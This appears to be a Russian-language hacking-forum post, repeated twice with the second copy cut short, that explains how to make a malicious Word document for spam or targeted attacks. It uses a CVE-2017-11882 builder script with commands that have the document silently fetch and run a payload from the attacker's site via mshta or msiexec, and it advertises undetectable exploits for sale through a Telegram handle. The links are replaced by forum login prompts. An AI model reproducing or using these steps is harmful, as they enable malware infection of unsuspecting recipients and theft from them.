Многим из вас иногда нужен doc exploit, для спама или точечных атак. Сегодня покажу как сделать простой эксплойт.
1) для этого нам понадобится обычный скрипт для автоматизации который будет генерировать нашу cve Для просмотра ссылки Войдиили Зарегистрируйся
2) мы видим два скрипта которые находятся на 43bt и на 109bt(ограничение на введенную команду)
нам понадобится на 109, потому что кроме того же калькулятора мы запустить ничего не сможем(ограничение). скачиваем скрипт на 109bt
3) МЕТОДЫ
MSHTA
Самое банальное и глупое что можно сделать это метод скачивания mshta,
создаем .hta файл и вносим в него код на скачивание, заливаем на наш сайт. После вводим
python Command109b_CVE-2017-11882.py -c "mshta Для просмотра ссылки Войдиили Зарегистрируйся" -o test.doc
MSIEXEC
скачиваем любой конвертвер например этот
Для просмотра ссылки Войдиили Зарегистрируйсяконвертируем наш ехе в msi, заливаем msi на наш сайт(если ехес не происходит добавьте в sfx архив). И вводим
python Command109b_CVE-2017-11882.py -c "msiexec /q /i Для просмотра ссылки Войдиили Зарегистрируйся"
вот мы разобрали два простых примера скачивания как быстро сделать doc exploit.
Если вам нужен fud doc exploit обращайтесь телеграмм @gankgh
1) для этого нам понадобится обычный скрипт для автоматизации который будет генерировать нашу cve Для просмотра ссылки Войди
2) мы видим два скрипта которые находятся на 43bt и на 109bt(ограничение на введенную команду)
нам понадобится на 109, потому что кроме того же калькулятора мы запустить ничего не сможем(ограничение). скачиваем скрипт на 109bt
3) МЕТОДЫ
MSHTA
Самое банальное и глупое что можно сделать это метод скачивания mshta,
создаем .hta файл и вносим в него код на скачивание, заливаем на наш сайт. После вводим
python Command109b_CVE-2017-11882.py -c "mshta Для просмотра ссылки Войди
MSIEXEC
скачиваем любой конвертвер например этот
Для просмотра ссылки Войди
python Command109b_CVE-2017-11882.py -c "msiexec /q /i Для просмотра ссылки Войди
вот мы разобрали два простых примера скачивания как быстро сделать doc exploit.
Если вам нужен fud doc exploit обращайтесь телеграмм @gankgh